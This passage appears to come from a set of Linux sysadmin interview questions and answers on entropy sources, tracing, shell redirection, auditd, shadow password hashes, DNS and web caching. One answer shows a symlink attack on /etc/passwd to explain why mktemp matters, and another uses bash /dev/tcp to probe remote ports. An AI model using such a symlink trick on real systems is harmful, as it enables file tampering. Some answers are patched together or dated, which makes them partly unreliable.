it?</b></summary><br> You should use `/dev/urandom`, not `/dev/random`. The two differences between `/dev/random` and `/dev/urandom` are: - `/dev/random` might be theoretically better _in the context of an information-theoretically secure algorithm_. This is the kind of algorithm which is secure against today's technology, and also tomorrow's technology, and technology used by aliens, and God's own iPad as well. - `/dev/urandom` will not block, while `/dev/random` may do so. `/dev/random` maintains a counter of "how much entropy it still has" under the assumption that any bits it has produced is a lost entropy bit. Blocking induces very real issues, e.g. a server which fails to boot after an automated install because it is stalling on its SSH server key creation. So you want to use `/dev/urandom` and stop to worry about this entropy business. The trick is that `/dev/urandom` never blocks, ever, even when it should: `/dev/urandom` is secure as long as it has received enough bytes of "initial entropy" since the last boot (32 random bytes are enough). A normal Linux installation will create a random seed (from `/dev/random`) upon installation, and save it on the disk. Upon each reboot, the seed will be read, fed into `/dev/urandom`, and a new seed immediately generated (from `/dev/urandom`) to replace it. Thus, this guarantees that `/dev/urandom` will always have enough initial entropy to produce cryptographically strong alea, perfectly sufficient for any mundane cryptographic job, including password generation. Should any of these daemons require randomness when all available entropy has been exhausted, they may pause to wait for more, which can cause excessive delays in your application. Even worse, since most modern applications will either resort to using its own random seed created at program initialization, or to using `/dev/urandom` to avoid blocking, your applications will suffer from lower quality random data. This can affect the integrity of your secure communications, and can increase the chance of cryptoanalysis on your private data. To check the amount of bytes of entropy currently available, use: ```bash cat /proc/sys/kernel/random/entropy_avail ``` **rng-tools** Fedora/Rh/Centos types: `sudo yum install rng-tools`. On deb types: `sudo apt-get install rng-tools` to set it up. Then run `sudo rngd -r /dev/urandom` before generating the keys. **haveged** Fedora/Rh/Centos types: `sudo yum install haveged` and add `/usr/local/sbin/haveged -w 1024` to `/etc/rc.local`. On deb types: `sudo apt-get install haveged` and add `DAEMON_ARGS="-w 1024"` to `/etc/default/haveged` to set it up. Then run `sudo rngd -r /dev/urandom` before generating the keys. Useful resources: - [Feeding /dev/random entropy pool? (original)](https://security.stackexchange.com/questions/89/feeding-dev-random-entropy-pool) - [GPG does not have enough entropy](https://serverfault.com/questions/214605/gpg-does-not-have-enough-entropy) </details> <details> <summary><b>What is the difference between <code>/sbin/nologin</code>, <code>/bin/false</code>, and <code>/bin/true</code>?</b></summary><br> When `/sbin/nologin` is set as the shell, if user with that shell logs in, they'll get a polite message saying 'This account is currently not available'. `/bin/false` is just a binary that immediately exits, returning false, when it's called, so when someone who has false as shell logs in, they're immediately logged out when false exits. Setting the shell to `/bin/true` has the same effect of not allowing someone to log in but false is probably used as a convention over true since it's much better at conveying the concept that person doesn't have a shell. `/bin/nologin` is the more user-friendly option, with a customizable message given to the user trying to log in, so you would theoretically want to use that; but both nologin and false will have the same end result of someone not having a shell and not being able to ssh in. Useful resources: - [What's the difference between /sbin/nologin and /bin/false](https://unix.stackexchange.com/questions/10852/whats-the-difference-between-sbin-nologin-and-bin-false) - [Why do some system users have /usr/bin/false as their shell?](https://superuser.com/questions/1183311/why-do-some-system-users-have-usr-bin-false-as-their-shell) </details> <details> <summary><b>Which symptoms might be suffering from a disk bottleneck? ***</b></summary><br> To be completed. </details> <details> <summary><b>What is the meaning of the error <code>maxproc limit exceeded by uid %i ...</code> in FreeBSD?</b></summary><br> The FreeBSD kernel will only allow a certain number of processes to exist at one time. The number is based on the **kern.maxusers** variable. **kern.maxusers** also affects various other in-kernel limits, such as network buffers. If the machine is heavily loaded, increase **kern.maxusers**. This will increase these other system limits in addition to the maximum number of processes. To adjust the **kern.maxusers** value, see the File/Process Limits section of the Handbook. While that section refers to open files, the same limits apply to processes. If the machine is lightly loaded but running a very large number of processes, adjust the **kern.maxproc** tunable by defining it in `/boot/loader.conf`. </details> <details> <summary><b>How to read a file line by line and assigning the value to a variable?</b></summary><br> For example: ```bash while IFS='' read -r line || [[ -n "$line" ]] ; do echo "Text read from file: $line" done < "/path/to/filename" ``` Explanation: - `IFS=''` (or `IFS=`) prevents leading/trailing whitespace from being trimmed. - `-r` prevents backslash escapes from being interpreted. - `|| [[ -n $line ]]` prevents the last line from being ignored if it doesn't end with a `\n` (since read returns a non-zero exit code when it encounters EOF). Useful resources: - [Read a file line by line assigning the value to a variable](https://stackoverflow.com/questions/10929453/read-a-file-line-by-line-assigning-the-value-to-a-variable) </details> <details> <summary><b>The client reports that his site received a grade B in the ssllabs scanner. Prepare a checklist of best practice for ssl configuration. ***</b></summary><br> Useful resources: - [Getting a Perfect SSL Labs Score](https://michael.lustfield.net/nginx/getting-a-perfect-ssl-labs-score) - [17 small suggestions how to improve ssllabs.com/ssltest/](https://community.qualys.com/thread/14023) - [How do you score A+ with 100 on all categories on SSL Labs test with Let's Encrypt and Nginx?](https://stackoverflow.com/questions/41930060/how-do-you-score-a-with-100-on-all-categories-on-ssl-labs-test-with-lets-encry) </details> <details> <summary><b>What does CPU jumps mean?</b></summary><br> An OS is a very busy thing, particularly so when you have it doing something (and even when you aren't). And when we are looking at an active enterprise environment, something is always going on. Most of this activity is "bursty", meaning processes are typically quiescent with short periods of intense activity. This is certainly true of any type of network-based activity (e.g. processing PHP requests), but also applies to OS maintenance (e.g. file system maintenance, page reclamation, disk I/O requests). If you take a situation where you have a lot of such bursty processes, you get a very irregular and spiky CPU usage plot. As `500 - Internal Server Error` says, the high number of context switches are going to make the situation even worse. Useful resources: - [What does "CPU jumps” mean? (original)](https://stackoverflow.com/questions/32185607/what-does-cpu-jumps-mean) </details> <details> <summary><b>How do you trace a system call in Linux? Explain the possible methods.</b></summary><br> **SystemTap** This is the most powerful method. It can even show the call arguments: Usage: ```bash sudo apt-get install systemtap sudo stap -e 'probe syscall.mkdir { printf("%s[%d] -> %s(%s)\n", execname(), pid(), name, argstr) }' ``` Then on another terminal: ```bash sudo rm -rf /tmp/a /tmp/b mkdir /tmp/a mkdir /tmp/b ``` Sample output: ```bash mkdir[4590] -> mkdir("/tmp/a", 0777) mkdir[4593] -> mkdir("/tmp/b", 0777) ``` **`strace` with `-f|-ff` params** You can use the `-f` and `-ff` option. Something like this: ```bash strace -f -e trace=process bash -c 'ls; : ``` - `-f` : Trace child processes as they are created by currently traced processes as a result of the fork(2) system call. - `-ff` : If the `-o` filename option is in effect, each processes trace is written to filename.pid where pid is the numeric process id of each process. This is incompatible with `-c`, since no per-process counts are kept. **`ltrace -S` shows both system calls and library calls** This awesome tool therefore gives even further visibility into what executables are doing. **`ftrace` minimal runnable example** Here goes a minimal runnable example. Run with `sudo`: ```bash #!/bin/sh set -eux d=debug/tracing mkdir -p debug if ! mountpoint -q debug; then mount -t debugfs nodev debug fi # Stop tracing. echo 0 > "${d}/tracing_on" # Clear previous traces. echo > "${d}/trace" # Find the tracer name. cat "${d}/available_tracers" # Disable tracing functions, show only system call events. echo nop > "${d}/current_tracer" # Find the event name with. grep mkdir "${d}/available_events" # Enable tracing mkdir. # Both statements below seem to do the exact same thing, # just with different interfaces. # https://www.kernel.org/static/html/v4.18/trace/events.html echo sys_enter_mkdir > "${d}/set_event" # echo 1 > "${d}/events/syscalls/sys_enter_mkdir/enable" # Start tracing. echo 1 > "${d}/tracing_on" # Generate two mkdir calls by two different processes. rm -rf /tmp/a /tmp/b mkdir /tmp/a mkdir /tmp/b # View the trace. cat "${d}/trace" # Stop tracing. echo 0 > "${d}/tracing_on" umount debug ``` Sample output: ```bash # tracer: nop # # _-----=> irqs-off https://sourceware.org/systemtap/documentation.html # / _----=> need-resched # | / _---=> hardirq/softirq # || / _--=> preempt-depth # ||| / delay # TASK-PID CPU# |||| TIMESTAMP FUNCTION # | | | |||| | | mkdir-5619 [005] .... 10249.262531: sys_mkdir(pathname: 7fff93cbfcb0, mode: 1ff) mkdir-5620 [003] .... 10249.264613: sys_mkdir(pathname: 7ffcdc91ecb0, mode: 1ff) ``` One cool thing about this method is that it shows the function call for all processes on the system at once, although you can also filter PIDs of interest with `set_ftrace_pid`. Useful resources: - [How do I trace a system call in Linux? (original)](https://stackoverflow.com/questions/29840213/how-do-i-trace-a-system-call-in-linux) - [Does ftrace allow capture of system call arguments to the Linux kernel, or only function names?](https://stackoverflow.com/questions/27608752/does-ftrace-allow-capture-of-system-call-arguments-to-the-linux-kernel-or-only) - [How to trace just system call events with ftrace without showing any other functions in the Linux kernel?](https://stackoverflow.com/questions/52764544/how-to-trace-just-system-call-events-with-ftrace-without-showing-any-other-funct) - [What system call is used to load libraries in Linux?](https://unix.stackexchange.com/questions/226524/what-system-call-is-used-to-load-libraries-in-linux) </details> <details> <summary><b>How to remove all files except some from a directory?</b></summary><br> Solution 1 - with `extglob`: ```bash shopt -s extglob rm !(textfile.txt|backup.tar.gz|script.php|database.sql|info.txt) ``` Solution 2 - with `find`: ```bash find . -type f -not -name '*txt' -print0 | xargs -0 rm -- ``` </details> <details> <summary><b>How to check if a string contains a substring in Bash?</b></summary><br> You can use `*` (wildcards) outside a case statement, too, if you use double brackets: ```bash string='some text' if [[ $string = *"My long"* ]] ; then true fi ``` </details> <details> <summary><b>Explain differences between <code>2>&-</code>, <code>2>/dev/null</code>, <code>|&</code>, <code>&>/dev/null</code>, and <code>>/dev/null 2>&1</code>.</b></summary><br> - a **number 1** = standard out (i.e. `STDOUT`) - a **number 2** = standard error (i.e. `STDERR`) - if a number isn't explicitly given, then **number 1** is assumed by the shell (bash) First let's tackle the function of these. `2>&-` The general form of this one is `M>&-`, where **"M"** is a file descriptor number. This will close output for whichever file descriptor is referenced, i.e. **"M"**. `2>/dev/null` The general form of this one is `M>/dev/null`, where **"M"** is a file descriptor number. This will redirect the file descriptor, **"M"**, to `/dev/null`. `2>&1` The general form of this one is `M>&N`, where **"M"** & **"N"** are file descriptor numbers. It combines the output of file descriptors **"M"** and **"N"** into a single stream. `|&` This is just an abbreviation for `2>&1 |`. It was added in Bash 4. `&>/dev/null` This is just an abbreviation for `>/dev/null 2>&1`. It redirects file descriptor 2 (`STDERR`) and descriptor 1 (`STDOUT`) to `/dev/null`. `>/dev/null` This is just an abbreviation for `1>/dev/null`. It redirects file descriptor 1 (`STDOUT`) to `/dev/null`. Useful resources: - [Difference between 2>&-, 2>/dev/null, |&, &>/dev/null and >/dev/null 2>&1](https://unix.stackexchange.com/questions/70963/difference-between-2-2-dev-null-dev-null-and-dev-null-21) - [Chapter 20. I/O Redirection](http://www.tldp.org/LDP/abs/html/io-redirection.html) </details> <details> <summary><b>How to redirect stderr and stdout to different files in the same line?</b></summary><br> Just add them in one line `command 2>> error 1>> output`. However, note that `>>` is for appending if the file already has data. Whereas, `>` will overwrite any existing data in the file. So, `command 2> error 1> output` if you do not want to append. Just for completion's sake, you can write `1>` as just `>` since the default file descriptor is the output. so `1>` and `>` is the same thing. So, `command 2> error 1> output` becomes, `command 2> error > output`. </details> <details> <summary><b>Load averages are above 30 on a server with 24 cores but CPU shows around 70 percent idle. One of the common causes of this condition is? How to debug and fixed?</b></summary><br> Requests which involve disk I/O can be slowed greatly if cpu(s) needs to wait on the disk to read or write data. I/O Wait, is the percentage of time the CPU has to wait on disk. Lets looks at how we can confirm if disk I/O is slowing down application performance by using a few terminal command line tools (`top`, `atop` and `iotop`). Example of debug: - answering whether or not I/O is causing system slowness - finding which disk is being written to - finding the processes that are causing high I/O - process list **state** - finding what files are being written too heavily - do you see your copy process put in **D** state waiting for I/O work to be done by pdflush? - do you see heavy synchronous write activity on your disks? also: - using `top` command - load averages and wa (wait time) - using `atop` command to monitor DSK (disk) I/O stats - using `iotop` command for real-time insight on disk read/writes For improvement performance: - check drive array configuration - check disk queuing algorithms and tuning them - tuning general block I/O parameters - tuning virtual memory management to improve I/O performance - check and tuning mount options and filesystem params (also responsible for cache) Useful resources: - [Linux server performance: Is disk I/O slowing your application? (original)](https://haydenjames.io/linux-server-performance-disk-io-slowing-application/) - [Troubleshooting High I/O Wait in Linux](https://bencane.com/2012/08/06/troubleshooting-high-io-wait-in-linux/) - [Debugging Linux I/O latency](https://superuser.com/questions/396696/debugging-linux-i-o-latency) - [How do pdflush, kjournald, swapd, etc interoperate?](https://unix.stackexchange.com/questions/76970/how-do-pdflush-kjournald-swapd-etc-interoperate) - [5 ways to improve HDD speed on Linux](https://thecodeartist.blogspot.com/2012/06/improving-hdd-performance-linux.html) </details> <details> <summary><b>How to enforce authorization methods in SSH? In what situations it would be useful?</b></summary><br> Force login with a password: ```bash ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@remote_host ``` Force login using the key: ```bash ssh -o PreferredAuthentications=publickey -o PubkeyAuthentication=yes -i id_rsa user@remote_host ``` Useful resources: - [How to force ssh client to use only password auth?](https://unix.stackexchange.com/questions/15138/how-to-force-ssh-client-to-use-only-password-auth) </details> <details> <summary><b>Getting <code>Too many Open files</code> error for Postgres. How to resolve it?</b></summary><br> Fixed the issue by reducing `max_files_per_process` e.g. to 200 from default 1000. This parameter is in `postgresql.conf` file and this sets the maximum number of simultaneously open files allowed to each server subprocess. Usually people start to edit `/etc/security/limits.conf` file, but forget that this file only apply to the actively logged in users through the PAM system. </details> <details> <summary><b>In what circumstance can <code>df</code> and <code>du</code> disagree on available disk space? How do you solve it?</b></summary><br> `du` checks usage of directories, but `df` checks free'd inodes, and files can be held open and take space after they're deleted. **Solution 1** Check for files on located under mount points. Frequently if you mount a directory (say a sambafs) onto a filesystem that already had a file or directories under it, you lose the ability to see those files, but they're still consuming space on the underlying disk. I've had file copies while in single user mode dump files into directories that I couldn't see except in single usermode (due to other directory systems being mounted on top of them). **Solution 2** On the other hand `df -h` and `du -sh` could mismatched by about 50% of the hard disk size. This was caused by e.g. Apache (httpd) keeping large log files in memory which had been deleted from disk. This was tracked down by running `lsof | grep "/var" | grep deleted` where `/var` was the partition I needed to clean up. The output showed lines like this: ``` httpd 32617 nobody 106w REG 9,4 1835222944 688166 /var/log/apache/awstats_log (deleted) ``` The situation was then resolved by restarting Apache (`service httpd restart`) and cleared of disk space, by allowing the locks on deleted files to be cleared. Useful resources: - [Why du and df display different values in Linux and Unix](https://linuxshellaccount.blogspot.com/2008/12/why-du-and-df-display-different-values.html) </details> <details> <summary><b>What is the difference between encryption and hashing?</b></summary><br> **Hashing**: Finally, hashing is a form of cryptographic security which differs from **encryption** whereas **encryption** is a two step process used to first encrypt and then decrypt a message, **hashing** condenses a message into an irreversible fixed-length value, or hash. </details> <details> <summary><b>Should the root certificate go on the server?</b></summary><br> **Self-signed root certificates** need not/should not be included in web server configuration. They serve no purpose (clients will always ignore them) and they incur a slight performance (latency) penalty because they increase the size of the SSL handshake. If the client does not have the root in their trust store, then it won't trust the web site, and there is no way to work around that problem. Having the web server send the root certificate will not help - the root certificate has to come from a trusted 3rd party (in most cases the browser vendor). Useful resources: - [SSL root certificate optional?](https://security.stackexchange.com/questions/65332/ssl-root-certificate-optional) </details> <details> <summary><b>How to log all commands run by root on production servers?</b></summary><br> `auditd` is the correct tool for the job here: 1. Add these 2 lines to `/etc/audit/audit.rules`: ```bash -a exit,always -F arch=b64 -F euid=0 -S execve -a exit,always -F arch=b32 -F euid=0 -S execve ``` These will track all commands run by root (euid=0). Why two rules? The execve syscall must be tracked in both 32 and 64 bit code. 2. To get rid of `auid=4294967295` messages in logs, add `audit=1` to the kernel's cmdline (by editing `/etc/default/grub`) 3. Place the line ```bash session required pam_loginuid.so ``` in all PAM config files that are relevant to login (`/etc/pam.d/{login,kdm,sshd}`), but not in the files that are relevant to su or sudo. This will allow auditd to get the calling user's uid correctly when calling sudo or su. Restart your system now. Let's login and run some commands: ```bash $ id -u 1000 $ sudo ls / bin boot data dev etc home initrd.img initrd.img.old lib lib32 lib64 lost+found media mnt opt proc root run sbin scratch seLinux srv sys tmp usr var vmlinuz vmlinuz.old $ sudo su - # ls /etc [...] ``` Now read `/var/log/audit/auditd.log` for show what has been logged in. Useful resources: - [Log all commands run by admins on production servers](https://serverfault.com/questions/470755/log-all-commands-run-by-admins-on-production-servers) </details> <details> <summary><b>How to prevent <code>dd</code> from freezing your system?</b></summary><br> Try using ionice: ```bash ionice -c3 dd if=/dev/zero of=file ``` This start the `dd` process with the "idle" IO priority: it only gets disk time when no other process is using disk IO for a certain amount of time. Of course this can still flood the buffer cache and cause freezes while the system flushes out the cache to disk. There are tunables under `/proc/sys/vm/` to influence this, particularly the `dirty_*` entries. </details> <details> <summary><b>How to limit processes to not exceed more than X% of CPU usage?</b></summary><br> **nice/renice** nice is a great tool for 'one off' tweaks to a system: ```bash nice COMMAND ``` **cpulimit** cpulimit if you need to run a CPU intensive job and having free CPU time is essential for the responsiveness of a system: ```bash cpulimit -l 50 COMMAND ``` **cgroups** cgroups apply limits to a set of processes, rather than to just one: ```bash cgcreate -g cpu:/cpulimited cgset -r cpu.shares=512 cpulimited cgexec -g cpu:cpulimited COMMAND_1 cgexec -g cpu:cpulimited COMMAND_2 cgexec -g cpu:cpulimited COMMAND_3 ``` </details> <details> <summary><b>How mount a temporary ram partition?</b></summary><br> ```bash # -t - filesystem type # -o - mount options mount -t tmpfs tmpfs /mnt -o size=64M ``` </details> <details> <summary><b>How to kills a process that is locking a file?</b></summary><br> ```bash fuser -k filename ``` </details> <details> <summary><b>Other admin trying to debug a server accidentally typed: <code>chmod -x /bin/chmod</code>. How to reset permissions back to default?</b></summary><br> ```bash # 1: cp /bin/ls chmod.01 cp /bin/chmod chmod.01 ./chmod.01 700 file # 2: /bin/busybox chmod 0700 /bin/chmod # 3: setfacl --set u::rwx,g::---,o::--- /bin/chmod # 4: /usr/lib/ld*.so /bin/chmod 0700 /bin/chmod ``` Useful resources: - [What can you do when you can't chmod chmod?](https://www.networkworld.com/article/3002286/operating-systems/what-can-you-do-when-you-cant-chmod-chmod.html) </details> <details> <summary><b><code>grub></code> vs <code>grub-rescue></code>. Explain.</b></summary><br> - `grub>` - this is the mode to which it passes if you find everything you need to run the system in addition to the configuration file. With this mode, we have access to most (if not all) modules and commands. This mode can be called from the menu by pressing the 'c' key - `grub-rescue` - this is the mode to which it passes if it is impossible to find its own directory (especially the directory with modules and additional commands, e.g. directory `/boot/grub/i386-pc`), if its contents are damaged or if no normal module is found, contains only basic commands </details> <details> <summary><b>How to check whether the private key and the certificate match?</b></summary><br> ```bash (openssl rsa -noout -modulus -in private.key | openssl md5 ; openssl x509 -noout -modulus -in certificate.crt | openssl md5) | uniq ``` </details> <details> <summary><b>How to add new user without using <code>useradd</code>/<code>adduser</code> commands?</b></summary><br> 1. Add an entry of user details in <code>/etc/passwd</code> with `vipw`: ```bash # username:password:UID:GID:Comments:Home_Directory:Login Shell user:x:501:501:test user:/home/user:/bin/bash ``` > Be careful with the syntax. Do not edit directly with an editor. `vipw` locks the file, so that other commands won't try to update it at the same time. 2. You will have to create a group with same name in <code>/etc/group</code> with `vigr` (similar tool for `vipw`): ```bash user:x:501: ``` 3. Assign a password to the user: ```bash passwd user ``` 4. Create the home directory of the user with mkdir: ```bash mkdir -m 0700 /home/user ``` 5. Copy the files from `/etc/skel` to the new home directory: ```bash rsync -av --delete /etc/skel/ /home/user ``` 6. Fix ownerships and permissions with `chown` and `chmod`: ```bash chown -R user:user /home/user chmod -R go-rwx /home/user ``` Useful resources: - [What steps to add a user to a system without using useradd/adduser?](https://unix.stackexchange.com/questions/153225/what-steps-to-add-a-user-to-a-system-without-using-useradd-adduser) </details> <details> <summary><b>Why do we need <code>mktemp</code> command? Present an example of use.</b></summary><br> <code>mktemp</code> randomizes the name. It is very important from the security point of view. Just imagine that you do something like: ```bash echo "random_string" > /tmp/temp-file ``` in your root-running script. And someone (who has read your script) does ```bash ln -s /etc/passwd /tmp/temp-file ``` The <code>mktemp</code> command could help you in this situation: ```bash TEMP=$(mktemp /tmp/temp-file.XXXXXXXX) echo "random_string" > ${TEMP} ``` Now this <code>ln /etc/passwd</code> attack will not work. </details> <details> <summary><b>Is it safe to attach the <code>strace</code> to a running process on the production? What are the consequences?</b></summary><br> `strace` is the system call tracer for Linux. It currently uses the arcane `ptrace()` (process trace) debugging interface, which operates in a violent manner: **pausing the target process** for each syscall so that the debugger can read state. And doing this twice: when the syscall begins, and when it ends. This means `strace` pauses your application twice for each syscall, and context-switches each time between the application and `strace`. It's like putting traffic metering lights on your application. Cons: - can cause significant and sometimes massive performance overhead, in the worst case, slowing the target application by over 100x. This may not only make it unsuitable for production use, but any timing information may also be so distorted as to be misleading - can't trace multiple processes simultaneously (with the exception of followed children) - visibility is limited to the system call interface Useful resources: - [strace Wow Much Syscall (original)](http://www.brendangregg.com/blog/2014-05-11/strace-wow-much-syscall.html) </details> <details> <summary><b>What is the easiest, safest and most portable way to remove <code>-rf</code> directory entry?</b></summary><br> They're effective but not optimally portable: - <code>rm -- -fr</code> - <code>perl -le 'unlink("-fr");'</code> People who go on about shell command line quoting and character escaping are almost as dangerous as those who simply don't even recognize why a file name like that poses any problem at all. The most portable solution: ```bash rm ./-fr ``` </details> <details> <summary><b>Write a simple bash script (or pair of scripts) to backup and restore your system. ***</b></summary><br> To be completed. </details> <details> <summary><b>What are salted hashes? Generate the password with salt for the <code>/etc/shadow</code> file.</b></summary><br> **Salt** at its most fundamental level is random data. When a properly protected password system receives a new password, it will create a hashed value for that password, create a new random salt value, and then store that combined value in its database. This helps defend against dictionary attacks and known hash attacks. For example, if a user uses the same password on two different systems, if they used the same hashing algorithm, they could end up with the same hash value. However, if even one of the systems uses salt with its hashes, the values will be different. The encrypted passwords in `/etc/shadow` file are stored in the following format: ```bash $ID$SALT$ENCRYPTED ``` The `$ID` indicates the type of encryption, the `$SALT` is a random (up to 16 characters) string and `$ENCRYPTED` is a password’s hash. <table style="width:100%"> <tr> <th>Hash Type</th> <th>ID</th> <th>Hash Length</th> </tr> <tr> <td>MD5</td> <td>$1</td> <td>22 characters</td> </tr> <tr> <td>SHA-256</td> <td>$5</td> <td>43 characters</td> </tr> <tr> <td>SHA-512</td> <td>$6</td> <td>86 characters</td> </tr> </table> Use the below commands from the Linux shell to generate hashed password for `/etc/shadow` with the random salt: - Generate **MD5** password hash ```bash python -c "import random,string,crypt; randomsalt = ''.join(random.sample(string.ascii_letters,8)); print crypt.crypt('MySecretPassword', '\$1\$%s\$' % randomsalt)" ``` - Generate **SHA-256** password hash ```bash python -c "import random,string,crypt; randomsalt = ''.join(random.sample(string.ascii_letters,8)); print crypt.crypt('MySecretPassword', '\$5\$%s\$' % randomsalt)" ``` - Generate **SHA-512** password hash ```bash python -c "import random,string,crypt; randomsalt = ''.join(random.sample(string.ascii_letters,8)); print crypt.crypt('MySecretPassword', '\$6\$%s\$' % randomsalt)" ``` </details> ###### Network Questions (27) <details> <summary><b>Create SPF records for your site to help control spam. ***</b></summary><br> To be completed. </details> <details> <summary><b>What is the difference between an authoritative and a nonauthoritative answer to a DNS query? ***</b></summary><br> An authoritative DNS query answer comes from the server that contains the zone files for the domain queried. This is the name server that the domain administrator set up the DNS records on. A nonauthoriative answer comes from a name server that does not host the domain zone files (for example, a commonly used name server has the answer cached such as Google's 8.8.8.8 or OpenDNS 208.67.222.222). </details> <details> <summary><b>If you try resolve hostname you get <code>NXDOMAIN</code> from <code>host</code> command. Your <code>resolv.conf</code> stores two nameservers but only second of this store this domain name. Why did not the local resolver check the second nameserver?</b></summary><br> **NXDOMAIN** is nothing but non-existent Internet or Intranet domain name. If domain name is unable to resolved using the DNS, a condition called the **NXDOMAIN** occurred. The default behavior for `resolv.conf` and the `resolver` is to try the servers in the order listed. The resolver will only try the next nameserver if the first nameserver times out. The algorithm used is to try a name server, and if the query times out, try the next, until out of name servers, then repeat trying all the name servers until a maximum number of retries are made. If a nameserver responds with **SERVFAIL** or a referral (**nofail**) or terminate query (**fail**) also only the first dns server will be used. Example: ``` nameserver 192.168.250.20 # it's not a dns nameserver 8.8.8.8 # not store gate.test.int nameserver 127.0.0.1 # store gate.test.int ``` so if you check: ``` host -v -t a gate.test.int Trying "gate.test.int" # trying first dns (192.168.250.20) but response is time out, so try the next nameserver Host gate.test.int not found: 3(NXDOMAIN) # ok but response is NXDOMAIN (not found this domain name) Received 88 bytes from 8.8.8.8#53 in 43 ms Received 88 bytes from 8.8.8.8#53 in 43 ms # so the last server in the list was not asked ``` To avoid this you can use e.g. `nslookup` command which will use the second nameserver if it receives a **SERVFAIL** from the first nameserver. Useful resources: - [Second nameserver in /etc/resolv.conf not picked up by wget](https://serverfault.com/questions/398837/second-nameserver-in-etc-resolv-conf-not-picked-up-by-wget) </details> <details> <summary><b>Explore the current MTA configuration at your site. What are some of the special features of the MTA that are in use? ***</b></summary><br> To be completed. </details> <details> <summary><b>How to find a domain based on the IP address? What techniques/tools can you use? ***</b></summary><br> To be completed. </details> <details> <summary><b>Is it possible to have SSL certificate for IP address, not domain name?</b></summary><br> It is possible (but rarely used) as long as it is a public IP address. An SSL certificate is typically issued to a Fully Qualified Domain Name (FQDN) such as `https://www.domain.com`. However, some organizations need an SSL certificate issued to a public IP address. This option allows you to specify a public IP address as the Common Name in your Certificate Signing Request (CSR). The issued certificate can then be used to secure connections directly with the public IP address (e.g. `https://1.1.1.1`.). According to the CA Browser forum, there may be compatibility issues with certificates for IP addresses unless the IP address is in both the commonName and subjectAltName fields. This is due to legacy SSL implementations which are not aligned with RFC 5280, notably, Windows OS prior to Windows 10. Useful resources: - [Are SSL certificates bound to the servers ip address?](https://stackoverflow.com/questions/1095780/are-ssl-certificates-bound-to-the-servers-ip-address) - [SSL certificate for a public IP address?](https://serverfault.com/questions/193775/ssl-certificate-for-a-public-ip-address) </details> <details> <summary><b>How do you do load testing and capacity planning for websites? ***</b></summary><br> To be completed. Useful resources: - [How do you do load testing and capacity planning for web sites? (original)](https://serverfault.com/questions/350454/how-do-you-do-load-testing-and-capacity-planning-for-web-sites) - [Can you help me with my capacity planning?](https://serverfault.com/questions/384686/can-you-help-me-with-my-capacity-planning) - [How do you do load testing and capacity planning for databases?](https://serverfault.com/questions/350458/how-do-you-do-load-testing-and-capacity-planning-for-databases) </details> <details> <summary><b>Developer reports a problem with connectivity to the remote service. Use <code>/dev</code> for troubleshooting.</b></summary><br> ```bash # <host> - set remote host # <port> - set destination port # 1 timeout 1 bash -c "</dev/tcp/<host>/<port>" >/dev/null 2>&1 ; echo $? # 2 timeout 1 bash -c 'cat < /dev/null > </dev/tcp/<host>/<port>' ; echo $? # 2 &> echo > "</dev/tcp/<host>/<port>" ``` Useful resources: - [Advanced Bash-Scripting Guide - /dev](http://www.tldp.org/LDP/abs/html/devref1.html#DEVTCP) - [/dev/tcp as a weapon](https://securityreliks.wordpress.com/2010/08/20/devtcp-as-a-weapon/) - [Test from shell script if remote TCP port is open](https://stackoverflow.com/questions/4922943/test-from-shell-script-if-remote-tcp-port-is-open) </details> <details> <summary><b>How do I measure request and response times at once using <code>curl</code>?</b></summary><br> `curl` supports formatted output for the details of the request (see the `curl` manpage for details, under `-w| -write-out 'format'`). For our purposes we’ll focus just on the timing details that are provided. 1. Create a new file, `curl-format.txt`, and paste in: ```bash time_namelookup: %{time_namelookup}\n time_connect: %{time_connect}\n time_appconnect: %{time_appconnect}\n time_pretransfer: %{time_pretransfer}\n time_redirect: %{time_redirect}\n time_starttransfer: %{time_starttransfer}\n ----------\n time_total: %{time_total}\n ``` 2. Make a request: ```bash curl -w "@curl-format.txt" -o /dev/null -s "http://example.com/" ``` What this does: - `-w "@curl-format.txt"` - tells cURL to use our format file - `-o /dev/null` - redirects the output of the request to /dev/null - `-s` - tells cURL not to show a progress meter `http://example.com/` is the URL we are requesting. Use quotes particularly if your URL has "&" query string parameters </details> <details> <summary><b>You need to move ext4 journal on another disk/partition. What are the reasons for this? ***</b></summary><br> To be completed. Useful resources: - [ext4: using external journal to optimize performance](https://raid6.com.au/posts/fs_ext4_external_journal/) - [How to move an ext4 journal](https://unix.stackexchange.com/questions/278998/how-to-move-an-ext4-journal) </details> <details> <summary><b>Does having Varnish in front of your website/app mean you don't need to care about load balancing or redundancy?</b></summary><br> It depends. Varnish is a cache server, so its purpose is to cache contents and to act as a reverse proxy, to speed up retrieval of data and to lessen the load on the webserver. Varnish can be also configured as a load-balancer for multiple web servers, but if we use just one Varnish server, this will become our single point of failure on our infrastructure. A better solution to ensure load-balancing or redundancy will be a cluster of at least two Varnish instances, in active-active mode or active-passive mode. </details> <details> <summary><b>What are hits, misses, and hit-for-pass in Varnish Cache?</b></summary><br> A **hit** is a request which is successfully served from the cache, a **miss** is a request that goes through the cache but finds an empty cache and therefore has to be fetched from the origin, the **hit-for-pass** comes in when Varnish Cache realizes that one of the objects it has requested is uncacheable and will result in a pass. Useful resources: - [VCL rules for hits](https://book.varnish-software.com/4.0/chapters/VCL_Subroutines.html#vcl-vcl-hit) - [VCL rules for hit-for-pass](https://book.varnish-software.com/4.0/chapters/VCL_Subroutines.html#hit-for-pass) - [Example of the use](https://book.varnish-software.com/4.0/chapters/VCL_Basics.html#vcl-backend-response) </details> <details> <summary><b>What is a reasonable TTL for cached content given the following parameters? ***</b></summary><br> To be completed. </details> <details> <summary><b>Developer says: <i><code>htaccess</code> is full of magic and it should be used</i>. What is your opinion about using <code>htaccess</code> files? How has this effect on the web app</b></summary><br> `.htaccess` files were born out of an era when shared hosting was common­place: - sysadmins needed a way to allow multiple clients to access their server under different accounts, with different configurations for their web­sites. The `.htaccess` file allowed them to modify how Apache works without having access to the entire server. These files can reside in any and every directory in the directory tree of the website and provide features to the directory and the files and folders inside it. **It’s horrible for performance** For `.htaccess` to work Apache needs to check EVERY directory in the requested path for the existence of a `.htaccess` file and if it exists it reads EVERY one of them and parses it. This happens for EVERY request. Remember that the second you change that file, it’s effective. This is because Apache reads it every time. Every single request the web­server handles - even for the lowliest `.png` or `.css` file - causes Apache to: - look for a `.htaccess` file in the directory of the current request - then look for a `.htaccess` file in every directory from there up to the server root - coalesce all of these `.htaccess` files together - reconfigure the web­server using the new settings - finally, deliver the file Every web­page can generate dozens of requests. This is over­head you don’t need, and what’s more, 